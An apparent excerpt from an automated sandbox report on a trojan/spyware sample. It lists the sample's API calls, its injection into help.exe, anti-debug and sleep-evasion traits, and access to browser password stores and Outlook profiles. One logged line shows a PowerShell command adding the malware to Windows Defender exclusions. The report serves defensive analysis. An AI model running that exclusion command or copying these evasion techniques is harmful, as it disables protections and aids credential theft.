                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe | Code function: 5_2_01883090 NtSetValueKey,5_2_01883090
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe | Code function: 5_2_01883010 NtOpenDirectoryObject,5_2_01883010
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe | Code function: 5_2_018839B0 NtGetContextThread,5_2_018839B0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe | Code function: 5_2_01883D10 NtOpenProcessToken,5_2_01883D10
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe | Code function: 5_2_01883D70 NtOpenThread,5_2_01883D70
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B4340 NtSetContextThread,LdrInitializeThunk,12_2_034B4340
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B4650 NtSuspendThread,LdrInitializeThunk,12_2_034B4650
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2B60 NtClose,LdrInitializeThunk,12_2_034B2B60
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2BE0 NtQueryValueKey,LdrInitializeThunk,12_2_034B2BE0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,12_2_034B2BF0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2BA0 NtEnumerateValueKey,LdrInitializeThunk,12_2_034B2BA0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2AD0 NtReadFile,LdrInitializeThunk,12_2_034B2AD0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2AF0 NtWriteFile,LdrInitializeThunk,12_2_034B2AF0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2F30 NtCreateSection,LdrInitializeThunk,12_2_034B2F30
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2FE0 NtCreateFile,LdrInitializeThunk,12_2_034B2FE0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2FB0 NtResumeThread,LdrInitializeThunk,12_2_034B2FB0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2EE0 NtQueueApcThread,LdrInitializeThunk,12_2_034B2EE0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2E80 NtReadVirtualMemory,LdrInitializeThunk,12_2_034B2E80
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2D10 NtMapViewOfSection,LdrInitializeThunk,12_2_034B2D10
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2D30 NtUnmapViewOfSection,LdrInitializeThunk,12_2_034B2D30
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2DD0 NtDelayExecution,LdrInitializeThunk,12_2_034B2DD0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2DF0 NtQuerySystemInformation,LdrInitializeThunk,12_2_034B2DF0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2C60 NtCreateKey,LdrInitializeThunk,12_2_034B2C60
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2C70 NtFreeVirtualMemory,LdrInitializeThunk,12_2_034B2C70
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2CA0 NtQueryInformationToken,LdrInitializeThunk,12_2_034B2CA0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B35C0 NtCreateMutant,LdrInitializeThunk,12_2_034B35C0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B39B0 NtGetContextThread,LdrInitializeThunk,12_2_034B39B0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2B80 NtQueryInformationFile,12_2_034B2B80
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2AB0 NtWaitForSingleObject,12_2_034B2AB0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2F60 NtCreateProcessEx,12_2_034B2F60
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2F90 NtProtectVirtualMemory,12_2_034B2F90
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2FA0 NtQuerySection,12_2_034B2FA0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2E30 NtWriteVirtualMemory,12_2_034B2E30
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2EA0 NtAdjustPrivilegesToken,12_2_034B2EA0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2D00 NtSetInformationFile,12_2_034B2D00
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2DB0 NtEnumerateKey,12_2_034B2DB0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2C00 NtQueryInformationProcess,12_2_034B2C00
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2CC0 NtQueryVirtualMemory,12_2_034B2CC0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2CF0 NtOpenProcess,12_2_034B2CF0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B3010 NtOpenDirectoryObject,12_2_034B3010
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B3090 NtSetValueKey,12_2_034B3090
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B3D70 NtOpenThread,12_2_034B3D70
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B3D10 NtOpenProcessToken,12_2_034B3D10
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_02B69290 NtAllocateVirtualMemory,12_2_02B69290
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_02B69090 NtDeleteFile,12_2_02B69090
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_02B69130 NtClose,12_2_02B69130
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_02B68E40 NtCreateFile,12_2_02B68E40
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_02B68FA0 NtReadFile,12_2_02B68FA0
                Source: Zjf9D3oDifslon7.bat.exe, 00000000.00000002.1277282682.00000000010FE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Zjf9D3oDifslon7.bat.exe
                Source: Zjf9D3oDifslon7.bat.exe, 00000000.00000002.1287457712.0000000002DC2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTL.dll" vs Zjf9D3oDifslon7.bat.exe
                Source: Zjf9D3oDifslon7.bat.exe, 00000000.00000000.1259039079.0000000000A42000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameiWNI.exeD vs Zjf9D3oDifslon7.bat.exe
                Source: Zjf9D3oDifslon7.bat.exe, 00000000.00000002.1308889768.0000000009180000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs Zjf9D3oDifslon7.bat.exe
                Source: Zjf9D3oDifslon7.bat.exe, 00000000.00000002.1307186326.0000000007200000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTL.dll" vs Zjf9D3oDifslon7.bat.exe
                Source: Zjf9D3oDifslon7.bat.exe, 00000005.00000002.1426102978.000000000193D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Zjf9D3oDifslon7.bat.exe
                Source: Zjf9D3oDifslon7.bat.exe, 00000005.00000002.1425850688.00000000013B7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameHelp.Exej% vs Zjf9D3oDifslon7.bat.exe
                Source: Zjf9D3oDifslon7.bat.exe, 00000005.00000002.1425850688.00000000013A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameHelp.Exej% vs Zjf9D3oDifslon7.bat.exe
                Source: Zjf9D3oDifslon7.bat.exe Binary or memory string: OriginalFilenameiWNI.exeD vs Zjf9D3oDifslon7.bat.exe
                Source: Zjf9D3oDifslon7.bat.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Zjf9D3oDifslon7.bat.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.Zjf9D3oDifslon7.bat.exe.9180000.4.raw.unpack, KJ0XgBe9sHdtVTebjt.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.Zjf9D3oDifslon7.bat.exe.9180000.4.raw.unpack, KJ0XgBe9sHdtVTebjt.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Zjf9D3oDifslon7.bat.exe.9180000.4.raw.unpack, KJ0XgBe9sHdtVTebjt.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.Zjf9D3oDifslon7.bat.exe.9180000.4.raw.unpack, e1UZNiBuDuWYUad08v.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.Zjf9D3oDifslon7.bat.exe.9180000.4.raw.unpack, e1UZNiBuDuWYUad08v.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@11/7@16/13
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Zjf9D3oDifslon7.bat.exe.log
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4868:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ecjg21v4.zkh.ps1
                Source: Zjf9D3oDifslon7.bat.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: help.exe, 0000000C.00000002.3722073116.0000000003044000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000C.00000002.3722073116.0000000003093000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000C.00000002.3722073116.0000000003065000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000C.00000002.3722073116.0000000003070000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000C.00000003.1606080046.0000000003065000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Zjf9D3oDifslon7.bat.exe Virustotal: Detection: 50%
                Source: Zjf9D3oDifslon7.bat.exe ReversingLabs: Detection: 47%
                Source: unknown Process created: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe "C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe"
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe Process created: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe "C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exe Process created: C:\Windows\SysWOW64\help.exe "C:\Windows\SysWOW64\help.exe"
                Source: C:\Windows\SysWOW64\help.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, dwrite.dll, textshaping.dll, windowscodecs.dll, amsi.dll, userenv.dll, msasn1.dll, gpapi.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, wldp.dll, windows.storage.dll, amsi.dll, userenv.dll, profapi.dll, msasn1.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, gpapi.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll, ncobjapi.dll, wbemcomn.dll, kernel.appcore.dll, mpclient.dll, userenv.dll, version.dll, msasn1.dll, wmitomi.dll, mi.dll, miutils.dll, gpapi.dll
                Source: C:\Windows\SysWOW64\help.exe Section loaded: wininet.dll, kernel.appcore.dll, uxtheme.dll, ieframe.dll, iertutil.dll, netapi32.dll, version.dll, userenv.dll, winhttp.dll, wkscli.dll, netutils.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, secur32.dll, mlang.dll, propsys.dll, winsqlite3.dll, vaultcli.dll, wintypes.dll, dpapi.dll, cryptbase.dll
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exe Section loaded: wininet.dll, mswsock.dll, dnsapi.dll, iphlpapi.dll, fwpuclnt.dll, rasadhlp.dll
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: Window Recorder Window detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\help.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: Zjf9D3oDifslon7.bat.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Zjf9D3oDifslon7.bat.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Zjf9D3oDifslon7.bat.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: iWNI.pdb source: Zjf9D3oDifslon7.bat.exe
                Source: Binary string: wntdll.pdbUGP source: Zjf9D3oDifslon7.bat.exe, 00000005.00000002.1426102978.0000000001810000.00000040.00001000.00020000.00000000.sdmp, help.exe, 0000000C.00000002.3724128272.0000000003440000.00000040.00001000.00020000.00000000.sdmp, help.exe, 0000000C.00000003.1427785390.0000000003298000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000C.00000003.1425876319.00000000030EE000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000C.00000002.3724128272.00000000035DE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Zjf9D3oDifslon7.bat.exe, Zjf9D3oDifslon7.bat.exe, 00000005.00000002.1426102978.0000000001810000.00000040.00001000.00020000.00000000.sdmp, help.exe, help.exe, 0000000C.00000002.3724128272.0000000003440000.00000040.00001000.00020000.00000000.sdmp, help.exe, 0000000C.00000003.1427785390.0000000003298000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000C.00000003.1425876319.00000000030EE000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000C.00000002.3724128272.00000000035DE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: iWNI.pdbSHA256 source: Zjf9D3oDifslon7.bat.exe
                Source: Binary string: help.pdbGCTL source: Zjf9D3oDifslon7.bat.exe, 00000005.00000002.1425850688.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000B.00000002.3723057357.000000000095E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: help.pdb source: Zjf9D3oDifslon7.bat.exe, 00000005.00000002.1425850688.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000B.00000002.3723057357.000000000095E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: nS7xrGJCV5KYH1dhdb.exe, 0000000B.00000002.3722689846.000000000085F000.00000002.00000001.01000000.0000000A.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000E.00000002.3722822138.000000000085F000.00000002.00000001.01000000.0000000A.sdmp

                Data Obfuscation

                Source: 0.2.Zjf9D3oDifslon7.bat.exe.9180000.4.raw.unpack, KJ0XgBe9sHdtVTebjt.cs .Net Code: AF88iys6gT System.Reflection.Assembly.Load(byte[])
                Source: Zjf9D3oDifslon7.bat.exe Static PE information: 0xD5B00858 [Tue Aug 10 00:31:20 2083 UTC]
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe Code function: 5_2_0041E87E push es; retf 5_2_0041E880
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe Code function: 5_2_0041E88A push esi; ret 5_2_0041E88B
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe Code function: 5_2_00404956 push CD785CF3h; ret 5_2_00404960
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe Code function: 5_2_004051F5 push ebx; retf 5_2_004051FA
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe Code function: 5_2_004139A3 push esi; ret 5_2_004139AA
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe Code function: 5_2_00405A87 push ecx; retf 5_2_00405A91
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe Code function: 5_2_0041ABDA push esi; ret 5_2_0041ABEA
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe Code function: 5_2_0041ABE3 push esi; ret 5_2_0041ABEA
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe Code function: 5_2_00417C4D push 00000024h; ret 5_2_00417C4F
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe Code function: 5_2_00418C73 push eax; ret 5_2_00418D0A
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe Code function: 5_2_004034F0 push eax; ret 5_2_004034F2
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe Code function: 5_2_00417570 push edx; retf 5_2_00417596
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe Code function: 5_2_00418DD0 push es; iretd 5_2_00418DD1
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe Code function: 5_2_004185A9 push A3C436E7h; ret 5_2_004185CB
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe Code function: 5_2_00404EC1 push ecx; iretd 5_2_00404EC6
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe Code function: 5_2_0041074B push 3788F9D1h; ret 5_2_00410752
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe Code function: 5_2_0040D709 push esp; iretd 5_2_0040D70A
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe Code function: 5_2_0041971B push ebx; iretd 5_2_00419720
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe Code function: 5_2_00417FCA push ebx; retf 5_2_00417FDD
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe Code function: 5_2_004117D3 push edi; ret 5_2_004117DA
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe Code function: 5_2_018409AD push ecx; mov dword ptr [esp], ecx 5_2_018409B6
                Source: C:\Windows\SysWOW64\help.exe Code function: 12_2_034709AD push ecx; mov dword ptr [esp], ecx 12_2_034709B6
                Source: C:\Windows\SysWOW64\help.exe Code function: 12_2_02B4E2E0 push edi; ret 12_2_02B4E2E7
                Source: C:\Windows\SysWOW64\help.exe Code function: 12_2_02B56228 push ebx; iretd 12_2_02B5622D
                Source: C:\Windows\SysWOW64\help.exe Code function: 12_2_02B52260 push esi; iretd 12_2_02B52261
                Source: C:\Windows\SysWOW64\help.exe Code function: 12_2_02B4D258 push 3788F9D1h; ret 12_2_02B4D25F
                Source: C:\Windows\SysWOW64\help.exe Code function: 12_2_02B52244 push cs; retf 12_2_02B52249
                Source: C:\Windows\SysWOW64\help.exe Code function: 12_2_02B5B397 push esi; ret 12_2_02B5B398
                Source: C:\Windows\SysWOW64\help.exe Code function: 12_2_02B5B38B push es; retf 12_2_02B5B38D
                Source: C:\Windows\SysWOW64\help.exe Code function: 12_2_02B550B6 push A3C436E7h; ret 12_2_02B550D8
                Source: C:\Windows\SysWOW64\help.exe Code function: 12_2_02B5407D push edx; retf 12_2_02B540A3
                Source: Zjf9D3oDifslon7.bat.exe Static PE information: section name: .text entropy: 7.8516612529531065

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\help.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match File source: Process Memory Space: Zjf9D3oDifslon7.bat.exe PID: 5628, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\help.exe API/Special instruction interceptor: Address: 7FF9105CD324
                Source: C:\Windows\SysWOW64\help.exe API/Special instruction interceptor: Address: 7FF9105CD7E4
                Source: C:\Windows\SysWOW64\help.exe API/Special instruction interceptor: Address: 7FF9105CD944
                Source: C:\Windows\SysWOW64\help.exe API/Special instruction interceptor: Address: 7FF9105CD504
                Source: C:\Windows\SysWOW64\help.exe API/Special instruction interceptor: Address: 7FF9105CD544
                Source: C:\Windows\SysWOW64\help.exe API/Special instruction interceptor: Address: 7FF9105CD1E4
                Source: C:\Windows\SysWOW64\help.exe API/Special instruction interceptor: Address: 7FF9105D0154
                Source: C:\Windows\SysWOW64\help.exe API/Special instruction interceptor: Address: 7FF9105CDA44
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe Memory allocated: 13B0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe Memory allocated: 2D60000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe Memory allocated: 4D60000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe Memory allocated: 9310000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe Memory allocated: A310000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe Memory allocated: A530000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe Memory allocated: B530000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe Code function: 5_2_0188096E rdtsc 5_2_0188096E
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5220
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 615
                Source: C:\Windows\SysWOW64\help.exe Window / User API: threadDelayed 9818
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\help.exe API coverage: 2.9 %
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe TID: 5396 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7220 Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7188 Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\SysWOW64\help.exe TID: 7736 Thread sleep count: 154 > 30
                Source: C:\Windows\SysWOW64\help.exe TID: 7736 Thread sleep time: -308000s >= -30000s
                Source: C:\Windows\SysWOW64\help.exe TID: 7736 Thread sleep count: 9818 > 30
                Source: C:\Windows\SysWOW64\help.exe TID: 7736 Thread sleep time: -19636000s >= -30000s
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exe TID: 7792 Thread sleep time: -85000s >= -30000s
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exe TID: 7792 Thread sleep count: 43 > 30
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exe TID: 7792 Thread sleep time: -64500s >= -30000s
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exe TID: 7792 Thread sleep count: 43 > 30
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exe TID: 7792 Thread sleep time: -43000s >= -30000s
                Source: C:\Windows\SysWOW64\help.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\help.exe Code function: 12_2_02B5C3D0 FindFirstFileW,FindNextFileW,FindClose,12_2_02B5C3D0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\help.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe Code function: 5_2_0188096E rdtsc 5_2_0188096E
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe Code function: 5_2_004178B3 LdrLoadDll,5_2_004178B3
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018464AB mov eax, dword ptr fs:[00000030h]5_2_018464AB
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018744B0 mov ecx, dword ptr fs:[00000030h]5_2_018744B0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018CA4B0 mov eax, dword ptr fs:[00000030h]5_2_018CA4B0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018404E5 mov ecx, dword ptr fs:[00000030h]5_2_018404E5
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01878402 mov eax, dword ptr fs:[00000030h]5_2_01878402
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01878402 mov eax, dword ptr fs:[00000030h]5_2_01878402
